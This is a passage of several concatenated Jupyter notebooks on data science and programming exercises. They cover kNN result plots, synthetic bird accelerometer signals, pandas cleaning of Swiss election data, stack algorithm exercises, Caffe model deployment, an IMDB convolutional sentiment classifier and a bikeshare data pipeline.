fold_series = folds, regression_model = knn, ) mse_series = pd.Series(mse_lst) rmse_series = mse_series.pow(1/2) mean_rmse = rmse_series.mean() sd_rmse = rmse_series.std(ddof = 1) new_row = (n_features, best_features, k, mean_rmse, sd_rmse) result_lst.append(new_row) result_df = pd.DataFrame(result_lst) result_df.columns = ["Number of Features", "Best Features", "k Neighbors", "Mean RMSE", "SD RMSE"] result_df = ( result_df .sort_values(["Mean RMSE", "SD RMSE"], ascending = True) .reset_index(drop = True) ) ###Output _____no_output_____ ###Markdown Before we discuss the top-performing models, let us look at the general trends in the results using some graphs. ###Code #collapse-hide sns.lineplot( data = result_df, x = "k Neighbors", y = "Mean RMSE", hue = "Number of Features", ) plt.title("Mean RMSE against k Neighbors") plt.show() ###Output _____no_output_____ ###Markdown The graph above shows that in general, no matter the number of features, the mean RMSE increased as the number of neighbors (k) increased. Therefore, it is best to have a low k value so that the model makes predictions only using a few cars that are most similar to the car being tested.Next, let us look at a graph with the same variables, except that the number of features is now on the x-axis instead of k. ###Code #collapse-hide sns.lineplot( data = result_df, x = "Number of Features", y = "Mean RMSE", hue = "k Neighbors", ) plt.title("Mean RMSE against Number of Features") plt.show() ###Output _____no_output_____ ###Markdown We can see that for models with a high k value (represented by the darker lines), the mean RMSE increased slightly as the number of features increased.However, for models with a low k value (represented by the lighter pink lines), the mean RMSE stayed the same or even decreased when the number of features increased.Therefore, the best model would be one with a low k value and a medium-to-high number of features.In order to determine this more precisely, let us look at the top 10 models with the lowest RMSE. ###Code #collapse-hide result_df.head(10) ###Output _____no_output_____
bird_flapping.ipynb
###Markdown As a research of bird behavior I am tracking birds with accelerometers using the https://uva-bits.nl system. To study the birds energy usage I want to create a machine learning model. To train this model I need some artificial data. Real data setThe https://github.com/NLeSC/eEcology-Annotation-UI/raw/master/demo/tracker.json was derived from the uva-bits database of tracker 355 on 2010-06-28. ###Code import json import urllib.request import pandas as pd with urllib.request.urlopen('https://github.com/NLeSC/eEcology-Annotation-UI/raw/master/demo/tracker.json') as f: data = json.load(f) frame = 34 df = pd.DataFrame({ 'x': data[frame]['x_acceleration'], 'y': data[frame]['y_acceleration'], 'z': data[frame]['z_acceleration']}, index=data[frame]['time_acceleration'] ) df.info() df.plot() ###Output <class 'pandas.core.frame.DataFrame'> Float64Index: 40 entries, 0.0 to 1.95 Data columns (total 3 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 x 40 non-null float64 1 y 40 non-null float64 2 z 40 non-null float64 dtypes: float64(3) memory usage: 1.2 KB ###Markdown Let us recreate this with sequgen ###Code import numpy as np from sequgen.deterministic.sine import sine from sequgen.deterministic.constant import constant t_predict = np.linspace(0, 2, 40) # 2 seconds of 20Hz x = sine(t_predict, wavelength=2/6, amplitude=0.25, phase_shift=0.25) + \ sine(t_predict, wavelength=2/6, amplitude=0.1, phase_shift=0.1) + \ constant(t_predict, -0.2) z = sine(t_predict, wavelength=2/6, # 6 flaps in 2 seconds amplitude=1, phase_shift=0.05) + constant(t_predict, 1) # add Earths gravity y = sine(t_predict, wavelength=2/6, amplitude=0.25, phase_shift=0.05) + \ sine(t_predict, wavelength=2/6, amplitude=0.1, phase_shift=0.2) pd.DataFrame({'x':x, 'y':y, 'z': z}, index=t_predict).plot() ###Output _____no_output_____
09 Pandas Teil 2/dataprojects/wahlen/Clean.ipynb
###Markdown Daten putzen So kommen wir vom BFS-Cube zu einem sauberen Datenfile **Quelle:**- Wahlergebnisse beim BFS: Daten gibts beim BFS: https://www.pxweb.bfs.admin.ch/pxweb/de/px-x-1702020000_105/px-x-1702020000_105/px-x-1702020000_105.px Vorbereitung Wir importieren ausnahmsweise etwas mehr Bibliotheken als sonst... ###Code import pandas as pd import numpy as np ###Output _____no_output_____ ###Markdown Daten laden Das wird ein bisschen ein Marathon...- Wir navigieren zuerst zum "Cube" des BFS: https://www.pxweb.bfs.admin.ch/pxweb/de/px-x-1702020000_105/px-x-1702020000_105/px-x-1702020000_105.px **1. Versuch:** Wir laden die Daten mal in csv-Form runter. (sie liegen bereits im Ordner `dataprojects/wahlen/`) ###Code path = 'px-x-1702020000_105.csv' #df = pd.read_csv(path) ###Output _____no_output_____ ###Markdown Schaffen wir das vielleicht mit dem Editor??Probleme:- Encoding- Startet nicht auf Zeile 1- Delimiter Hilfe zur `read()`-Funktion: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.htmlHilfe zum Encoding gibt's hier: - https://docs.python.org/3/library/codecs.htmlstandard-encodings... aber welches Encoding?? Trick: Shell code nutzen mit `!` ###Code !file -I {path} df = pd.read_csv(path, delimiter=';', skiprows=2, encoding='latin_1') df.head(5) ###Output _____no_output_____ ###Markdown Das ist hübsch... aber:- die Gemeinden haben grässlichen Vorzeichen- es fehlen die wichtigen Gemeindenummern! **2. Versuch:** Wir probieren es mit Excel ###Code path = 'px-x-1702020000_105.xlsx' df = pd.read_excel(path) df.head(10) ###Output _____no_output_____ ###Markdown ... das sieht auch nicht gerade sehr erquickend aus!! ###Code df = pd.read_excel(path, skiprows=2) df.head(5) ###Output _____no_output_____ ###Markdown - Wir müssen Spaltennamen erfinden... ###Code columns = ['Gemeinde_ID', 'Gemeinde_Name', 'Jahr', 'Jahr2', 'Partei_ID', 'Partei_Name', 'Partei_Anteil'] df = pd.read_excel(path, skiprows=2, names=columns) df.head(10) ###Output _____no_output_____ ###Markdown ... aber was ist mit den vielen Nan's??Wir müssen mehr Zeilen anzeigen... ###Code df.head(100) ###Output _____no_output_____ ###Markdown Wir brauchen NOCH MEHR ZEILEN! Wie geht das? https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.set_option.html ###Code pd.set_option("display.max_rows", 100) df.head(100) ###Output _____no_output_____ ###Markdown Wir müssen die fehlenden Felder füllen!Pandas hat dafür eine SEHR PRAKTISCHE FUNKTION: `ffill()` ###Code df = df.ffill() df.head(100) ###Output _____no_output_____ ###Markdown Kucken wir uns zur Sicherheit noch den Schluss an: ###Code df.tail(100) ###Output _____no_output_____ ###Markdown Oh oh... wir haben noch Abfall am Ende!Wir können das mit einem einfachen Trick beseitigen: ###Code df = df[0:115632] df ###Output _____no_output_____ ###Markdown **Aber...**... bevor wir jetzt endgültig mit der Analyse beginnen, müssen wir noch etwas investieren Daten reinigen Wir müssen die drei Punkte ersetzen durch NaN ###Code df['Partei_Anteil'] = df['Partei_Anteil'].replace('...', np.nan) df ###Output _____no_output_____ ###Markdown - Wozu genau ist die zweite Jahresspalte da??? Weg damit. ###Code df = df.drop(columns=['Jahr2']) df ###Output _____no_output_____ ###Markdown - Bezirke? Wollen wir nicht! (Der `.str[]`-Operator ist hierfür handy) ###Code df['Gemeinde_Name'].str[0:2] == '>>' df = df.drop(index=df[df['Gemeinde_Name'].str[0:2] == '>>'].index) df ###Output _____no_output_____ ###Markdown - Die Punkte vor dem Gemeindenamen... können auch noch weg ###Code df['Gemeinde_Name'] = df['Gemeinde_Name'].str.replace('......', '', regex=False) df.head() ###Output _____no_output_____ ###Markdown - Die Gemeinde_ID, das Jahr und die Partei_ID sind integer ###Code df['Gemeinde_ID'] = df['Gemeinde_ID'].astype(int) df['Jahr'] = df['Jahr'].astype(int) df['Partei_ID'] = df['Partei_ID'].astype(int) df.head() df ###Output _____no_output_____ ###Markdown Jeeeetzt sind wir fertig und können mit der Analyse beginnen.Wir exportieren das File. Struktur modifizieren ###Code df2 = pd.pivot_table(df, index=['Gemeinde_ID', 'Gemeinde_Name', 'Partei_Name'], columns='Jahr', values='Partei_Anteil') df2 df2 = df2.reset_index() df2 ###Output _____no_output_____ ###Markdown Export ###Code df2.to_csv("Wahlergebnisse 1999 und 2019 in Gemeinden.csv", index=False) ###Output _____no_output_____
Coding-Ninjas-Data-Structure-and-Algorithm-in-Python-main/Stack/All codes in one.ipynb
###Markdown Code : Stack Using LL ###Code from sys import stdin class Node : def __init__(self, data) : self.data = data self.next = None class Stack : def __init__(self) : self.__head = None self.__size = 0 def getSize(self) : return self.__size def isEmpty(self) : return self.__size == 0 def push(self, data) : newNode = Node(data) if self.__head is None : self.__head = newNode else : newNode.next = self.__head self.__head= newNode self.__size += 1 def pop(self) : if self.__head is None : return -1 ans = self.__head.data self.__head = self.__head.next self.__size -= 1 return ans def top(self) : if self.__head is None : return -1 return self.__head.data #main q = int(stdin.readline().strip()) stack = Stack() while q > 0 : inputs = stdin.readline().strip().split(" ") choice = int(inputs[0]) if choice == 1 : data = int(inputs[1]) stack.push(data) elif choice == 2 : print(stack.pop()) elif choice == 3 : print(stack.top()) elif choice == 4 : print(stack.getSize()) else : if stack.isEmpty() : print("true") else : print("false") q -= 1 ###Output _____no_output_____ ###Markdown Balanced Paranthesis ###Code from sys import stdin def isEmpty(stack) : return len(stack) == 0 def isBalanced(expression) : stack = list() for i in range(len(expression)) : if expression[i] == '(' : stack.append(expression[i]) elif expression[i] == ')' : if isEmpty(stack) : return False topChar = stack.pop(); if expression[i] == ')' and topChar == '(' : continue else : return False return isEmpty(stack); #main expression = stdin.readline().strip() if isBalanced(expression) : print("true") else : print("false") ###Output _____no_output_____ ###Markdown Reverse Stack ###Code from sys import stdin, setrecursionlimit setrecursionlimit(10 ** 6) def reverseStack(inputStack, extraStack) : if len(inputStack) == 0: return; lastElement = inputStack.pop() reverseStack(inputStack, extraStack); while not isEmpty(inputStack) : top = inputStack.pop() extraStack.append(top) inputStack.append(lastElement) while not isEmpty(extraStack) : top = extraStack.pop() inputStack.append(top) '''-------------- Utility Functions --------------''' #Takes a list as a stack and returns whether the stack is empty or not def isEmpty(stack) : return len(stack) == 0 #Taking input using fast I/o method def takeInput() : size = int(stdin.readline().strip()) inputStack = list() if size == 0 : return inputStack values = list(map(int, stdin.readline().strip().split(" "))) inputStack = values return inputStack #main inputStack = takeInput() emptyStack = list() reverseStack(inputStack, emptyStack) while not isEmpty(inputStack) : print(inputStack.pop(), end = " ") ###Output _____no_output_____ ###Markdown Check redundant brackets ###Code from sys import stdin def checkRedundantBrackets(expression) : stk = list() for i in range(len(expression)) : if (expression[i] == '(') or (find(expression[i])) : stk.append(expression[i]) elif expression[i] == ')' : hasOperator = False while not isEmpty(stk) and top(stk) != '(' : stk.pop() hasOperator = True if not hasOperator : return True if not isEmpty(stk) : stk.pop() return False '''-------------- Utility Functions --------------''' def find(ch) : if ch == '+' or ch == '-' or ch == '*' or ch == '/' : return True return False #Takes a list as a stack and returns whether the stack is empty or not def isEmpty(stack) : return len(stack) == 0 #Takes a list as a stack and returns the element at the top def top(stack) : #assuming the stack is never empty return stack[len(stack) - 1] #main expression = stdin.readline().strip() if checkRedundantBrackets(expression) : print("true") else : print("false") ###Output _____no_output_____ ###Markdown Stock Span ###Code from sys import stdin def stockSpan(price, n) : stk = list() output = [-1] * n stk.append(0) output[0] = 1 for i in range(1, n) : while (not isEmpty(stk)) and (price[top(stk)] < price[i]) : stk.pop() if isEmpty(stk) : output[i] = i + 1 else : output[i] = i - top(stk) stk.append(i) return output '''-------------- Utility Functions --------------''' #Takes a list as a stack and returns whether the stack is empty or not def isEmpty(stack) : return len(stack) == 0 #Takes a list as a stack and returns the element at the top def top(stack) : #assuming the stack is never empty return stack[len(stack) - 1] def printList(arr) : for i in range(len(arr)) : print(arr[i], end = " ") print() def takeInput(): size = int(stdin.readline().strip()) if size == 0 : return list(), 0 price = list(map(int, stdin.readline().strip().split(" "))) return price, size #main price, n = takeInput() output = stockSpan(price, n) printList(output) ###Output _____no_output_____ ###Markdown Minimum bracket Reversal ###Code from sys import stdin def countBracketReversals(inputString) : length = len(inputString) if length == 0 : return 0 if length % 2 != 0 : return -1 # Only even number of brackets can be balanced stack = list() for i in range(length) : currentChar = inputString[i] if currentChar == '{' : stack.append(currentChar) else : # Pop if there is a balanced pair if (not isEmpty(stack)) and (top(stack) == '{') : stack.pop() else : stack.append(currentChar) count = 0 #Only unbalanced brackets are there in stack now while not isEmpty(stack) : char1 = stack.pop() char2 = stack.pop() ''' When char1 = } and char2 = {, then we need to reverse both of them so count will increase by 2 ''' if char1 != char2 : count += 2 else : count += 1 return count '''-------------- Utility Functions --------------''' #Takes a list as a stack and returns whether the stack is empty or not def isEmpty(stack) : return len(stack) == 0 #Takes a list as a stack and returns the element at the top def top(stack) : #assuming the stack is never empty return stack[len(stack) - 1] #main print(countBracketReversals(stdin.readline().strip())) ###Output _____no_output_____
toolkit/xnlp/Explanations Analysis Run 02 - Turkish.ipynb
###Markdown LOC type entities - analysis ###Code loc_group_explanations = explanations[explanations['entity_type'] == "LOC"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1) loc_group_explanations['Loc'].clip(lower=-1.0, upper=1, inplace=False) len(morpho_tag_to_id) loc_group_explanations.size for idx, morpho_tag in enumerate(list(morpho_tag_to_id.keys())): if idx % 9 == 0: fig = plt.figure(int(idx/9)) rem = idx % 9 plt.subplot(3, 3, rem+1) print(morpho_tag) # sns.violinplot(data=list(loc_group_explanations[morpho_tag].clip(lower=-0.5, upper=0.5))) data = loc_group_explanations[morpho_tag].dropna().clip(lower=-0.5, upper=0.5) print(data) if data.size > 0: sns.distplot(data) plt.show() loc_group_explanations mean_loc_group_explanations = loc_group_explanations.mean() mean_loc_group_explanations.sort_values(ascending=False) loc_group_explanations['Loc'].sort_values()[:10] loc_group_explanations['Loc'].sort_values(ascending=False)[:10] loc_group_explanations.hist(['Loc'], range=[-1, 1], bins=100) loc_group_explanations.hist(['Loc'], range=[-0.015, 0.015], bins=100) loc_group_explanations['Loc'].value_counts().sort_values(ascending=False) [(loc_group_explanations['Loc'][loc_group_explanations['Loc'] < 0]).mean(), (loc_group_explanations['Loc'][loc_group_explanations['Loc'] >= 0]).mean()] loc_group_explanations.hist(['Loc^DB'], range=[-1, 1]) loc_group_explanations.hist(['Loc']) loc_group_explanations.hist(['Loc^DB']) loc_group_explanations.hist(['Loc'], range=[-5000, -10], bins=100) loc_group_explanations.hist(['Loc'], range=[1, 1000], bins=100) loc_group_explanations['Loc'][loc_group_explanations['Loc'] < 0].count() loc_group_explanations['Loc'][loc_group_explanations['Loc'] >= 0].count() for morpho_tag in ['Loc', 'Loc^DB']: below_zero = loc_group_explanations[morpho_tag][loc_group_explanations[morpho_tag] < 0].count() above_zero = loc_group_explanations[morpho_tag][loc_group_explanations[morpho_tag] >= 0].count() print(morpho_tag, below_zero, above_zero) ###Output Loc 2681 1818 Loc^DB 653 523 ###Markdown ORG type entities - analysis ###Code org_group_explanations = explanations[explanations['entity_type'] == "ORG"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1) org_group_explanations.mean().sort_values(ascending=False) ###Output _____no_output_____ ###Markdown PER type entities - analysis ###Code per_group_explanations = explanations[explanations['entity_type'] == "PER"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1) per_group_explanations.mean().sort_values(ascending=False) !ls ../../explanations-for-ner-train-finnish-201901* ###Output _____no_output_____
NVIDIA Training/Deployment.ipynb
###Markdown Deployment Which files constitute a "model"?We make a trained network useful by removing it from its training environment and "deploying" it into an application. Start where we left off in DIGITS.DIGITS places the files we need to deploy in a directory that can either be downloaded or just pointed to. Since we're going to be deploying our model on the same server where it was trained, we can just point to the folder path that DIGITS generates. Open DIGITS.From DIGITS home page, select the model that we named "Dogs vs. Cats".DIGITS' "Job Page" for the model is what you see as soon as you create the model, when it is training, and/or if you select the model under DIGITS' "model" tab. The Job Directory is in the top left.![](images/ModelJobView.PNG)**Copy the job directory (highlighted above) and replace FIXME in the code block below. Once you've copied the directory, execute the cell (Shift+Enter) to store it to the variable MODEL_JOB_DIR** ###Code MODEL_JOB_DIR = '##FIXME##' ## Remember to set this to be the job directory for your model !ls $MODEL_JOB_DIR ###Output _____no_output_____ ###Markdown Assuming you copied and pasted well, you will see a list of all files in that directory. If the following instructions do not match what you're seeing, check the copy/paste directions.Again, our "model" consists of two files: the architecture and the weights. The architecture is the file called ```deploy.prototxt``` and the weights are in the most recent snapshot file ```snapshot_iter_.caffemodel.```In this case, snapshot number 735 contains the weights learned after all 5 epochs. ###Code ARCHITECTURE = MODEL_JOB_DIR + '/' + 'deploy.prototxt' WEIGHTS = MODEL_JOB_DIR + '/' + 'snapshot_iter_735.caffemodel' print ("Filepath to Architecture = " + ARCHITECTURE) print("Filepath to weights = "+ WEIGHTS) ###Output _____no_output_____ ###Markdown Next, we need to make sure that the program that we're building can both read and process those files. For this basic type of deployment, we'll need to install (or include) the framework that they were written in to be able to interpret them. We'll learn to deploy to environments that don't require installing the framework later in this course. We'll also need to use the GPU to take advantage of parallel processing. Again, our model consists of hundreds of thousands of operations that can be largely accelerated through parallelization. ###Code import caffe caffe.set_mode_gpu() ###Output _____no_output_____ ###Markdown Next, we'll create a "Classifier" object called "net". The more common the workflow, the easier existing tools will make your project. In this case, image classification is very common, so this next code block simply takes your architecture file and weights file and a bit about the data and makes common actions easy. ###Code # Initialize the Caffe model using the model trained in DIGITS net = caffe.Classifier(ARCHITECTURE, WEIGHTS, channel_swap =(2, 1, 0), #Color images have three channels, Red, Green, and Blue. raw_scale=255) #Each pixel value is a number between 0 and 255 #Each "channel" of our images are 256 x 256 ###Output _____no_output_____ ###Markdown The Classifier class includes a method called "predict", which takes an input of an image as defined above and generates an output of the likelihood of the image belonging to each category. Creating an Expected Input: PreprocessingTo start with something easy, let's attempt to correctly classify a labeled image from the dataset. We can load the image and view it by running the cell below. ###Code import matplotlib.pyplot as plt #matplotlib.pyplot allows us to visualize results input_image= caffe.io.load_image('/dli/data/dogscats/train/cats/cat.10941.jpg') plt.imshow(input_image) plt.show() ###Output _____no_output_____ ###Markdown While this is the image we have, it is not the 'input' the network expects. To prepare data for inference, we're going to follow one golden rule:Whatever was done prior to training must be done prior to inferenceIn the last section, you saw the files that were generated when DIGITS trained your model. In this section, we'll examine the files generated when DIGITS created your dataset.The job directory for the **dataset** you just trained from is found by selecting the dataset from the model page "Dogs and Cats" and/or if you select the dataset under DIGITS' "dataset" tab. It's in the same place it was for the model, but should be a different number.![](images/datasetjobdir.PNG)Replace FIXME with it and execute the code below to set DATA_JOB_DIR to the right filepath and examine what's inside: ###Code DATA_JOB_DIR = '##FIXME##' ## Remember to set this to be the job directory for your model !ls $DATA_JOB_DIR ###Output _____no_output_____ ###Markdown Again, there is more information here than you need (for now). There is an infinite amount that you *could* know about data science and data prep which will become clear as you work through a variety of deep learning problems. In this case, DIGITS did two steps prior to training. We call this *preprocessing.*1) DIGITS resized the images to 256X256 color images ###Code import cv2 input_image=cv2.resize(input_image, (256, 256), 0,0) plt.imshow(input_image) plt.show() ###Output _____no_output_____ ###Markdown 2) DIGITS *normalized* the images by subtracting the mean image from each image to reduce the computation necessary to train. Load the mean image and subtract it from the test image below: ###Code mean_image = caffe.io.load_image(DATA_JOB_DIR+'/mean.jpg') ready_image = input_image-mean_image ###Output _____no_output_____ ###Markdown We've now taken data as it was and converted it into data that our network expects. Next, let's see what output our network creates. Forward Propagation: Using your modelThis is what we care about. Let's take a look at the function: prediction = net.predict([grid_square]).Like any [function](https://www.khanacademy.org/computing/computer-programming/programmingfunctions), net.predict passes an input, ready_image, and returns an output, prediction. Unlike other functions, this function isn't following a list of steps, instead, it's performing layer after layer of matrix math to transform an image into a vector of probabilities. Run the cell below to see the prediction from labeled the labeled data above. ###Code # make prediction prediction = net.predict([ready_image]) print prediction ###Output _____no_output_____ ###Markdown Interesting, but doesn't contain all that much information. Our network took a normalized 256x256 color image and generated a vector of length 2. Generating a useful output: PostprocessingAt this point, we can really build whatever we want. Your only limit is your programming experience. Before getting creative, let's build something basic. This code will determine whether our network output a higher value for the likelihood of "dog" than it did for "cat." If so, it will display an image that would be appropriate if a dog approached our simulated doggy door. If not, the image represents what we'd want to happen if our network determined a cat was at the door. ###Code print("Input image:") plt.imshow(input_image) plt.show() print("Output:") if prediction.argmax()==0: print "Sorry cat:( https://media.giphy.com/media/jb8aFEQk3tADS/giphy.gif" else: print "Welcome dog! https://www.flickr.com/photos/aidras/5379402670" ###Output _____no_output_____ ###Markdown Here, now is everything in one place so you can test with an image that a doggy door might see. ###Code ##Create an input our network expects input_image= caffe.io.load_image('/dli/data/fromnest.PNG') input_image=cv2.resize(input_image, (256, 256), 0,0) ready_image = input_image-mean_image ##Treat our network as a function that takes an input and generates an output prediction = net.predict([ready_image]) print("Input Image:") plt.imshow(input_image) plt.show() print(prediction) ##Create a useful output print("Output:") if prediction.argmax()==0: print "Sorry cat:( https://media.giphy.com/media/jb8aFEQk3tADS/giphy.gif" else: print "Welcome dog! https://www.flickr.com/photos/aidras/5379402670" ###Output _____no_output_____ ###Markdown Essentially, we've created a simulator for our doggy door challenge. We've created an application that takes an input from a camera, converts it to a data type our network expects, generates an output, and then converts that output into something useful to a user. You could see how you might easily have a positive output control a motor in a doggy door. With regards to deep learning, you have what you need! To see what other images you can try in the code block above, list the test images (images that weren't used for training) can be found by running the command below. Expect some of these images to output the wrong classification. Test them until you're satisfied and then continue in the course to find out how to improve performance! ###Code !ls /dli/data/dogscats/test ###Output _____no_output_____ ###Markdown Putting it all togetherLet's put this deployment process together to see how it might look outside of this Jupyter notebook. In the Python file at [pythondeployment.py](../../../../edit/tasks/task3/task/pythondeployment.py), you'll see the same code as above, but consolidated into one file. You'll use this approach during your end of course assessment, so take a look. Insert the filepath to a test image here to visualize it. ###Code TEST_IMAGE = '/dli/data/dogscats/test/1.jpg' display= caffe.io.load_image(TEST_IMAGE) plt.imshow(display) plt.show() ###Output _____no_output_____ ###Markdown And then run our small python application with that image as input below. Ignore most of the output and scroll to the bottom. (Even errors and warnings are fine.) ###Code !python pythondeployment.py $TEST_IMAGE 2>/dev/null ###Output _____no_output_____
notebooks/nlp/6_conv_net_sentiment_classifier_for_imdb.ipynb
###Markdown Convolutional Net for Sentiment Classification This Conv Net performs sentiment analysis on the IMDB review dataset. ###Code import os from tensorflow.keras.datasets import imdb from tensorflow.keras.preprocessing.sequence import pad_sequences from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, Flatten, Dropout, Activation from tensorflow.keras.layers import Layer, Embedding, Conv1D, SpatialDropout1D, GlobalMaxPool1D from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping from tensorflow.keras.models import load_model import sklearn.metrics from sklearn.metrics import roc_auc_score import numpy as np import pandas as pd import matplotlib.pyplot as plt %matplotlib inline ###Output _____no_output_____ ###Markdown Set Hyperparameters ###Code output_dir = 'model_output/conv' epochs = 3 batch_size = 64 patience = 10 val_split = .3 n_dim = 192 n_unique_words = 8000 max_review_length = 200 pad_type = trunc_type = 'pre' n_conv = 128 k_conv = 3 n_dense = 256 dropout = 0.5 ###Output _____no_output_____ ###Markdown Load Data ###Code (X_train, y_train), (X_valid, y_valid) = imdb.load_data(num_words=n_unique_words) ###Output _____no_output_____ ###Markdown Preprocess Data ###Code X_train = pad_sequences(X_train, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0) X_valid = pad_sequences(X_valid, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0) ###Output _____no_output_____ ###Markdown Design Conv Net Architecture ###Code model = Sequential() model.add(Embedding(n_unique_words, n_dim, input_length=max_review_length)) model.add(Conv1D(n_conv, k_conv, activation='relu')) model.add(GlobalMaxPool1D()) model.add(Dense(n_dense, activation='relu')) model.add(Dense(n_dense, activation='relu')) model.add(Dropout(dropout)) model.add(Dense(1, activation='sigmoid')) model.summary() ###Output _____no_output_____ ###Markdown Configure the Model ###Code model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) modelCheckpoint = ModelCheckpoint(monitor='val_accuracy', filepath=output_dir + '/imdb-cnn.hdf5', save_best_only=True, mode='max') earlyStopping = EarlyStopping(monitor='val_accuracy', mode='max', patience=patience) if not os.path.exists(output_dir): os.makedirs(output_dir) ###Output _____no_output_____ ###Markdown TensorBoard ###Code tensorboard = TensorBoard("../logs/imdb-cnn") ###Output _____no_output_____ ###Markdown Train the Model ###Code history = model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_split=val_split, callbacks=[modelCheckpoint, earlyStopping, tensorboard]) ###Output _____no_output_____ ###Markdown Evaluate ###Code model = load_model(output_dir+'/imdb-cnn.hdf5') y_hat = model.predict_proba(X_valid) final_loss, final_acc = model.evaluate(X_valid, y_valid, verbose = 2) print("Final loss: {0:.4f}, final accuracy: {1:.4f}".format(final_loss, final_acc)) plt.hist(y_hat) _ = plt.axvline(x=0.5, color='orange') pct_auc = roc_auc_score(y_valid, y_hat) * 100 print('{:0.2f}'.format(pct_auc)) print(np.std(history.history['loss'])) fpr, tpr, _ = sklearn.metrics.roc_curve(y_valid, y_hat) roc_auc = sklearn.metrics.auc(fpr, tpr) plt.figure() lw = 2 plt.plot(fpr, tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc) plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--') plt.xlim([0.0, 1.0]) plt.ylim([0.0, 1.05]) plt.xlabel('False Positive Rate') plt.ylabel('True Positive Rate') plt.title('Receiver Operating Characteristic') plt.legend(loc="lower right") plt.show() ###Output _____no_output_____
v1/notebooks/3_data_pipeline_get_data.ipynb
###Markdown Data Pipeline to Get Data ###Code %load_ext lab_black %load_ext autoreload %autoreload 2 import pandas as pd from prefect import Flow ###Output _____no_output_____ ###Markdown About Use a data pipeline to assemble the data used in the dashboard. User Inputs ###Code open_tor_data_url = ( "https://ckan0.cf.opendata.inter.prod-toronto.ca/api/3/action/package_show" ) trips_data_glob_str = "data/raw/*.csv" stations_params = {"id": "2b44db0d-eea9-442d-b038-79335368ad5a"} stations_cols_wanted = [ "station_id", "name", "physical_configuration", "lat", "lon", "altitude", "address", "capacity", "physicalkey", "transitcard", "creditcard", "phone", ] neigh_profile_params = {"id": "6e19a90f-971c-46b3-852c-0c48c436d1fc"} pt_params = {"id": "7795b45e-e65a-4465-81fc-c36b9dfff169"} poi_params = {"id": "965247c0-c72e-49b4-bb1a-879cf98e1a32"} ch_params = {"id": "c7be2ee7-d317-4a28-8cbe-bff1ce116b46"} neigh_boundary_params = {"id": "4def3f65-2a65-4a4f-83c4-b2a4aed72d46"} neigh_cols_to_show = [ "AREA_ID", "AREA_SHORT_CODE", "AREA_LONG_CODE", "AREA_NAME", "Shape__Area", "Shape__Length", "LATITUDE", "AREA_LATITUDE", "LONGITUDE", "AREA_LONGITUDE", "geometry", ] trips_nan_cols = [ "START_STATION_ID", "END_STATION_ID", "START_STATION_NAME", "END_STATION_NAME", ] trips_duplicated_cols = ["TRIP_ID", "START_TIME", "END_TIME"] cols = ["STATION_NAME", "year", "month", "day", "hour"] # Exporting to staged CSV files cols_to_export = [ "STATION_NAME", "YEAR", "MONTH", "DAY", "HOUR", "USER_TYPE", "NUM_TRIPS", "DURATION_MEAN", "AREA_NAME", "PHYSICAL_CONFIGURATION", "CAPACITY", "PHYSICALKEY", "TRANSITCARD", "CREDITCARD", "PHONE", "NEIGH_TRANSIT_STOPS", "NEIGH_COLLEGES_UNIVS", "NEIGH_CULTURAL_ATTRACTIONS", "NEIGH_PLACES_OF_INTEREST", ] nrows_per_staged_csv_file = 350_000 %aimport src.data_pipe_utils import src.data_pipe_utils as dpu ###Output /home/elsdes3/Downloads/bikeshare-dash/.tox/build/lib/python3.9/site-packages/geopandas/_compat.py:111: UserWarning: The Shapely GEOS version (3.10.2-CAPI-1.16.0) is incompatible with the GEOS version PyGEOS was compiled with (3.10.0-CAPI-1.16.0). Conversions between both will be slow. warnings.warn( ###Markdown Data Pipeline Define Pipeline ###Code with Flow("My Functional Flow") as flow: df_stations = dpu.get_bikeshare_stations_metadata( open_tor_data_url, stations_params, stations_cols_wanted, ) df = dpu.get_bikeshare_trips_data( trips_data_glob_str, trips_nan_cols, trips_duplicated_cols, ) dfch_essentials = dpu.get_city_cultural_hotspots_data(open_tor_data_url, ch_params) df_poi = dpu.get_city_points_of_interest_data(open_tor_data_url, poi_params) gdf = dpu.get_city_neighbourhood_boundary_data( open_tor_data_url, neigh_boundary_params, neigh_cols_to_show, ) df_pt_slice = dpu.get_city_public_transit_locations_data( open_tor_data_url, pt_params ) df_coll_univ = dpu.get_city_college_university_locations_data() df_neigh_demog = dpu.get_neighbourhood_profile_data( open_tor_data_url, neigh_profile_params ) ( df_poi_new, dfch_essentials_new, df_coll_univ_new, df_pt_slice_new, df_neigh_stats, df_stations_new, ) = dpu.aggregate_data( gdf, df_poi, dfch_essentials, df_coll_univ, df_pt_slice, df_neigh_demog, df_stations, ) df_hour_by_station_merged = dpu.combine_trips_neighbourhood_data( df, cols, df_stations_new ) dpu.export_aggregated_data_multiple_csvs( df_hour_by_station_merged, cols_to_export, nrows_per_staged_csv_file, ) ###Output _____no_output_____ ###Markdown Run Pipeline ###Code %%time state = flow.run() %%time # print(state.result[gdf].shape) # display(state.result[gdf].result.describe()) display(state.result[df_neigh_demog].result.describe()) # display(state.result[df_poi_new].result.describe()) # display(state.result[dfch_essentials_new].result.describe()) # display(state.result[df_coll_univ_new].result.describe()) # display(state.result[df_pt_slice_new].result.describe()) with pd.option_context('display.max_columns', 100): display(state.result[df_neigh_stats].result.describe()) display(state.result[df_stations_new].result.describe()) display(state.result[df_hour_by_station_merged].result.describe()) ###Output _____no_output_____
B_Submissions_Kopuru_competition/2021-05-12_submit/batch_OLSyears/workerbee01_HONEYCOMB.ipynb
